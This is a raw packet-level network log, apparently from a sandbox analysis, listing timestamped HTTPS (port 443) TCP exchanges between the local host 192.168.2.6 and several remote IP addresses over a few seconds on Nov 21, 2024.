                                                                                                                                                                        Nov 21, 2024 10:38:10.206613064 CET49883443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:10.206623077 CET4434988313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.303064108 CET4434986913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.306292057 CET4434986913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.306503057 CET49869443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:10.306587934 CET49869443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:10.306610107 CET4434986913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.306623936 CET49869443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:10.306629896 CET4434986913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.310262918 CET49884443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:10.310307026 CET4434988413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.310409069 CET49884443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:10.310570955 CET49884443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:10.310585976 CET4434988413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.315084934 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.315109015 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.315150023 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:10.315167904 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.315185070 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:10.315587997 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:10.331278086 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.331310034 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.331346035 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:10.331362963 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.331374884 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:10.331401110 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:10.345233917 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.345251083 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.345285892 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:10.345300913 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.345333099 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:10.345346928 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:10.361408949 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.361426115 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.361480951 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:10.361507893 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.361525059 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:10.361684084 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:10.377571106 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.377587080 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.377621889 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:10.377646923 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.377664089 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:10.377759933 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:10.379982948 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.380055904 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.380109072 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:10.380121946 CET4434986613.107.246.45192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.380137920 CET49866443192.168.2.613.107.246.45
                                                                                                                                                                        Nov 21, 2024 10:38:10.482420921 CET4434987013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.482893944 CET49870443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:10.482908010 CET4434987013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.485157967 CET49870443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:10.485162973 CET4434987013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.925934076 CET4434987013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.929609060 CET4434987013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.929668903 CET49870443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:10.929672956 CET4434987013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.929728985 CET49870443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:10.929805040 CET49870443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:10.929820061 CET4434987013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.929831028 CET49870443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:10.929836988 CET4434987013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.932617903 CET49886443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:10.932651043 CET4434988613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:10.932720900 CET49886443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:10.932868958 CET49886443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:10.932882071 CET4434988613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:11.429572105 CET4434988113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:11.430053949 CET49881443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:11.430087090 CET4434988113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:11.430521011 CET49881443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:11.430527925 CET4434988113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:11.817596912 CET49897443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:38:11.817634106 CET4434989740.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:11.817699909 CET49897443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:38:11.818367004 CET49897443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:38:11.818381071 CET4434989740.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:11.876348019 CET4434988113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:11.879488945 CET4434988113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:11.879573107 CET49881443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:11.879679918 CET49881443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:11.879688978 CET4434988113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:11.879700899 CET49881443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:11.879705906 CET4434988113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:11.884326935 CET49898443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:11.884407997 CET4434989813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:11.884485006 CET49898443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:11.884654045 CET49898443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:11.884676933 CET4434989813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:11.936667919 CET4434988313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:11.937613964 CET49883443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:11.937622070 CET4434988313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:11.938059092 CET49883443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:11.938062906 CET4434988313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:11.994560957 CET4434988213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:12.010087013 CET49882443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:12.010116100 CET4434988213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:12.010673046 CET49882443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:12.010680914 CET4434988213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:12.029813051 CET4434988413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:12.030374050 CET49884443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:12.030400038 CET4434988413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:12.030865908 CET49884443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:12.030879021 CET4434988413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:12.296020985 CET44349841172.217.16.196192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:12.296122074 CET44349841172.217.16.196192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:12.297456026 CET49841443192.168.2.6172.217.16.196
                                                                                                                                                                        Nov 21, 2024 10:38:12.372459888 CET4434988313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:12.375025988 CET4434988313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:12.377475023 CET49883443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:12.378621101 CET49883443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:12.378634930 CET4434988313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:12.378671885 CET49883443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:12.378676891 CET4434988313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:12.382005930 CET49901443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:12.382034063 CET4434990113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:12.382283926 CET49901443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:12.382498026 CET49901443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:12.382510900 CET4434990113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:12.449074984 CET4434988213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:12.452241898 CET4434988213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:12.452333927 CET49882443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:12.452399015 CET49882443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:12.452410936 CET4434988213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:12.452424049 CET49882443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:12.452429056 CET4434988213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:12.456007004 CET49902443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:12.456037998 CET4434990213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:12.456149101 CET49902443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:12.456329107 CET49902443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:12.456345081 CET4434990213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:12.464675903 CET4434988413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:12.467588902 CET4434988413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:12.467700005 CET4434988413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:12.467825890 CET49884443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:12.467825890 CET49884443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:12.467967033 CET49884443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:12.467978954 CET4434988413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:12.467988014 CET49884443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:12.467993021 CET4434988413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:12.474195004 CET49903443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:12.474225044 CET4434990313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:12.474306107 CET49903443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:12.474706888 CET49903443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:12.474715948 CET4434990313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:12.651781082 CET4434988613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:12.707977057 CET49886443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:12.876748085 CET49886443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:12.876769066 CET4434988613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:12.878643990 CET49886443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:12.878650904 CET4434988613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:13.198388100 CET4434988613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:13.201478004 CET4434988613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:13.201733112 CET49886443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:13.201910019 CET49886443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:13.201931953 CET4434988613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:13.201968908 CET49886443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:13.201975107 CET4434988613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:13.210194111 CET49904443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:13.210242033 CET4434990413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:13.210302114 CET49904443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:13.212136030 CET49904443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:13.212155104 CET4434990413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:13.323566914 CET49841443192.168.2.6172.217.16.196
                                                                                                                                                                        Nov 21, 2024 10:38:13.323574066 CET44349841172.217.16.196192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:13.571723938 CET4434989740.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:13.571798086 CET49897443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:38:13.578192949 CET49897443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:38:13.578210115 CET4434989740.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:13.578485012 CET4434989740.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:13.580039024 CET49897443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:38:13.580188990 CET49897443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:38:13.580197096 CET4434989740.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:13.580362082 CET49897443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:38:13.627334118 CET4434989740.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:13.665174961 CET4434989813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:13.717833996 CET49898443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:13.717859030 CET4434989813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:13.723217010 CET49898443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:13.723222971 CET4434989813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:13.825048923 CET49910443192.168.2.652.149.20.212
                                                                                                                                                                        Nov 21, 2024 10:38:13.825066090 CET4434991052.149.20.212192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:13.825119019 CET49910443192.168.2.652.149.20.212
                                                                                                                                                                        Nov 21, 2024 10:38:13.826112986 CET49910443192.168.2.652.149.20.212
                                                                                                                                                                        Nov 21, 2024 10:38:13.826122999 CET4434991052.149.20.212192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:13.971719980 CET4434989740.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:13.971833944 CET4434989740.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:13.971904993 CET49897443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:38:13.974241018 CET49897443192.168.2.640.113.110.67
                                                                                                                                                                        Nov 21, 2024 10:38:13.974247932 CET4434989740.113.110.67192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:14.110507965 CET4434989813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:14.113284111 CET4434989813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:14.113364935 CET49898443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:14.115454912 CET49898443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:14.115475893 CET4434989813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:14.115489006 CET49898443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:14.115494013 CET4434989813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:14.117965937 CET49912443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:14.117986917 CET4434991213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:14.118062973 CET49912443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:14.118196011 CET49912443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:14.118208885 CET4434991213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:14.168864012 CET4434990113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:14.176969051 CET4434990213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:14.179137945 CET49901443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:14.179157019 CET4434990113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:14.179948092 CET49901443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:14.179953098 CET4434990113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:14.184165001 CET49902443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:14.184190989 CET4434990213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:14.184937000 CET49902443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:14.184945107 CET4434990213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:14.320883989 CET4434990313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:14.352375984 CET49903443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:14.352396011 CET4434990313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:14.352982998 CET49903443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:14.352988005 CET4434990313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:14.610088110 CET4434990213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:14.613111973 CET4434990113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:14.613755941 CET4434990213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:14.613878012 CET4434990213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:14.613903999 CET49902443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:14.613953114 CET49902443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:14.614382982 CET49902443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:14.614382982 CET49902443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:14.614393950 CET4434990213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:14.614403009 CET4434990213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:14.616162062 CET4434990113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:14.616216898 CET49901443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:14.620090008 CET49901443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:14.620090008 CET49901443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:14.620100975 CET4434990113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:14.620110035 CET4434990113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:14.622384071 CET49921443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:14.622410059 CET4434992113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:14.622648001 CET49921443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:14.624560118 CET49921443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:14.624577045 CET4434992113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:14.625971079 CET49922443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:14.625987053 CET4434992213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:14.626085997 CET49922443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:14.626324892 CET49922443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:14.626337051 CET4434992213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:14.774801016 CET4434990313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:14.777956963 CET4434990313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:14.778037071 CET49903443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:14.778068066 CET49903443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:14.778083086 CET4434990313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:14.778115034 CET49903443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:14.778120995 CET4434990313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:14.780816078 CET49923443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:14.780848980 CET4434992313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:14.780965090 CET49923443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:14.781343937 CET49923443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:14.781356096 CET4434992313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:14.991715908 CET4434990413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:14.992136955 CET49904443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:14.992155075 CET4434990413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:15.006880999 CET49904443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:15.006886005 CET4434990413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:15.434798956 CET4434990413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:15.438117027 CET4434990413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:15.438163996 CET4434990413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:15.438262939 CET49904443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:15.484232903 CET49904443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:15.484261036 CET4434990413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:15.484273911 CET49904443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:15.484280109 CET4434990413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:15.496597052 CET49924443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:15.496633053 CET4434992413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:15.497004032 CET49924443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:15.497735023 CET49924443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:15.497747898 CET4434992413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:15.577450991 CET4434991052.149.20.212192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:15.577521086 CET49910443192.168.2.652.149.20.212
                                                                                                                                                                        Nov 21, 2024 10:38:15.582812071 CET49910443192.168.2.652.149.20.212
                                                                                                                                                                        Nov 21, 2024 10:38:15.582818031 CET4434991052.149.20.212192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:15.583113909 CET4434991052.149.20.212192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:15.594305038 CET49910443192.168.2.652.149.20.212
                                                                                                                                                                        Nov 21, 2024 10:38:15.639338017 CET4434991052.149.20.212192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:15.836162090 CET4434991213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:15.836702108 CET49912443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:15.836725950 CET4434991213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:15.837167978 CET49912443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:15.837176085 CET4434991213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:16.269390106 CET4434991213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:16.272614956 CET4434991213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:16.272706032 CET49912443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:16.272886992 CET49912443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:16.272910118 CET4434991213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:16.272923946 CET49912443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:16.272931099 CET4434991213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:16.274950981 CET4434991052.149.20.212192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:16.274975061 CET4434991052.149.20.212192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:16.274996042 CET4434991052.149.20.212192.168.2.6
